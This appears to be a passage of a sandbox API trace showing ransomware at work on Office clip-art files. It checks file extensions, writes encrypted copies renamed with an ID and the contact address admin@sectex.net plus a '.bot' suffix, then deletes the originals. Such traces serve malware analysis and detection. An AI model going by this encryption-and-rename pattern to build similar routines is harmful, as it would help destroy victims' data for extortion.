	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString=".jpg") returned 4
	[0145.392] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString=".doc") returned 4
	[0145.392] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString=".docx") returned 5
	[0145.392] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.392] lstrlenW (lpString=".pdf") returned 4
	[0145.392] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString=".xls") returned 4
	[0145.392] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.392] lstrlenW (lpString=".xlsx") returned 5
	[0145.392] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.392] lstrlenW (lpString=".ppt") returned 4
	[0145.392] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString=".zip") returned 4
	[0145.392] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.392] lstrlenW (lpString=".rar") returned 4
	[0145.392] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString=".bz2") returned 4
	[0145.392] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString=".7z") returned 3
	[0145.392] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.392] lstrlenW (lpString=".dbf") returned 4
	[0145.392] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.392] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.393] lstrlenW (lpString=".1cd") returned 4
	[0145.393] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.393] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00006_.WMF") returned 63
	[0145.393] lstrlenW (lpString=".jpg") returned 4
	[0145.393] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.393] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.393] lstrlenW (lpString="EN00202_.WMF") returned 12
	[0145.393] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.543] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6938) returned 1
	[0145.543] CloseHandle (hObject=0x3c0) returned 1
	[0145.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf")) returned 0x20
	[0145.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.544] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.544] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0145.545] GetLastError () returned 0x0
	[0145.545] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1b1a, lpOverlapped=0x0) returned 1
	[0145.548] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1b20, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1b20, lpOverlapped=0x0) returned 1
	[0145.549] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.549] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.550] SetEndOfFile (hFile=0x3c4) returned 1
	[0145.550] CloseHandle (hObject=0x3c4) returned 1
	[0145.550] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.550] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.552] CloseHandle (hObject=0x3c0) returned 1
	[0145.552] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.552] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00202_.wmf")) returned 1
	[0145.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.553] lstrlenW (lpString=".doc") returned 4
	[0145.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.553] lstrlenW (lpString=".docx") returned 5
	[0145.553] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.553] lstrlenW (lpString=".pdf") returned 4
	[0145.553] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.553] lstrlenW (lpString=".xls") returned 4
	[0145.553] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.553] lstrlenW (lpString=".xlsx") returned 5
	[0145.553] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.553] lstrlenW (lpString=".ppt") returned 4
	[0145.553] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.553] lstrlenW (lpString=".zip") returned 4
	[0145.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.553] lstrlenW (lpString=".rar") returned 4
	[0145.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.553] lstrlenW (lpString=".bz2") returned 4
	[0145.553] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.553] lstrlenW (lpString=".7z") returned 3
	[0145.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString=".dbf") returned 4
	[0145.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString=".1cd") returned 4
	[0145.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString=".jpg") returned 4
	[0145.554] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString=".doc") returned 4
	[0145.554] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString=".docx") returned 5
	[0145.554] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.554] lstrlenW (lpString=".pdf") returned 4
	[0145.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString=".xls") returned 4
	[0145.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.554] lstrlenW (lpString=".xlsx") returned 5
	[0145.554] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.554] lstrlenW (lpString=".ppt") returned 4
	[0145.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.554] lstrlenW (lpString=".zip") returned 4
	[0145.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.554] lstrlenW (lpString=".rar") returned 4
	[0145.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString=".bz2") returned 4
	[0145.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.554] lstrlenW (lpString=".7z") returned 3
	[0145.555] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.555] lstrlenW (lpString=".dbf") returned 4
	[0145.555] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.555] lstrlenW (lpString=".1cd") returned 4
	[0145.555] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.555] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00202_.WMF") returned 63
	[0145.555] lstrlenW (lpString=".jpg") returned 4
	[0145.555] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.555] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.555] lstrlenW (lpString="EN00222_.WMF") returned 12
	[0145.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.556] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=12356) returned 1
	[0145.556] CloseHandle (hObject=0x3c0) returned 1
	[0145.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 0x20
	[0145.556] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.557] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.557] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0145.557] GetLastError () returned 0x0
	[0145.557] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x3044, lpOverlapped=0x0) returned 1
	[0145.559] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x3050, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x3050, lpOverlapped=0x0) returned 1
	[0145.560] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.560] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.560] SetEndOfFile (hFile=0x3c4) returned 1
	[0145.560] CloseHandle (hObject=0x3c4) returned 1
	[0145.561] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.561] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.563] CloseHandle (hObject=0x3c0) returned 1
	[0145.563] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.563] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00222_.wmf")) returned 1
	[0145.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.563] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".doc") returned 4
	[0145.564] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString=".docx") returned 5
	[0145.564] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.564] lstrlenW (lpString=".pdf") returned 4
	[0145.564] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString=".xls") returned 4
	[0145.564] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.564] lstrlenW (lpString=".xlsx") returned 5
	[0145.564] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.564] lstrlenW (lpString=".ppt") returned 4
	[0145.564] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".zip") returned 4
	[0145.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.564] lstrlenW (lpString=".rar") returned 4
	[0145.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString=".bz2") returned 4
	[0145.564] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString=".7z") returned 3
	[0145.564] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".dbf") returned 4
	[0145.564] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".1cd") returned 4
	[0145.564] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".jpg") returned 4
	[0145.564] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.564] lstrlenW (lpString=".doc") returned 4
	[0145.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString=".docx") returned 5
	[0145.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.565] lstrlenW (lpString=".pdf") returned 4
	[0145.565] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString=".xls") returned 4
	[0145.565] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.565] lstrlenW (lpString=".xlsx") returned 5
	[0145.565] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.565] lstrlenW (lpString=".ppt") returned 4
	[0145.565] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.565] lstrlenW (lpString=".zip") returned 4
	[0145.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.565] lstrlenW (lpString=".rar") returned 4
	[0145.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString=".bz2") returned 4
	[0145.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString=".7z") returned 3
	[0145.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.565] lstrlenW (lpString=".dbf") returned 4
	[0145.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.565] lstrlenW (lpString=".1cd") returned 4
	[0145.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00222_.WMF") returned 63
	[0145.565] lstrlenW (lpString=".jpg") returned 4
	[0145.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0145.566] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0145.566] lstrlenW (lpString="EN00242_.WMF") returned 12
	[0145.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.567] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=6780) returned 1
	[0145.567] CloseHandle (hObject=0x3c0) returned 1
	[0145.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 0x20
	[0145.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0145.567] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.567] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0145.568] GetLastError () returned 0x0
	[0145.568] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x1a7c, lpOverlapped=0x0) returned 1
	[0145.569] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1a80, lpOverlapped=0x0) returned 1
	[0145.570] ReadFile (in: hFile=0x3c0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.570] WriteFile (in: hFile=0x3c4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.571] SetEndOfFile (hFile=0x3c4) returned 1
	[0145.571] CloseHandle (hObject=0x3c4) returned 1
	[0145.571] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.571] SetEndOfFile (hFile=0x3c0) returned 1
	[0145.573] CloseHandle (hObject=0x3c0) returned 1
	[0145.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.573] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 1
	[0145.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.574] lstrlenW (lpString=".doc") returned 4
	[0145.574] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0145.574] lstrlenW (lpString=".docx") returned 5
	[0145.574] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0145.574] lstrlenW (lpString=".pdf") returned 4
	[0145.574] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0145.574] lstrlenW (lpString=".xls") returned 4
	[0145.574] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0145.574] lstrlenW (lpString=".xlsx") returned 5
	[0145.574] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0145.574] lstrlenW (lpString=".ppt") returned 4
	[0145.574] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0145.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.574] lstrlenW (lpString=".zip") returned 4
	[0145.574] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0145.574] lstrlenW (lpString=".rar") returned 4
	[0145.574] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0145.574] lstrlenW (lpString=".bz2") returned 4
	[0145.574] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0145.574] lstrlenW (lpString=".7z") returned 3
	[0145.574] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0145.574] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.574] lstrlenW (lpString=".dbf") returned 4
	[0145.575] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString=".1cd") returned 4
	[0145.575] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0145.575] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63
	[0145.575] lstrlenW (lpString=".jpg") returned 4
	[0145.575] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
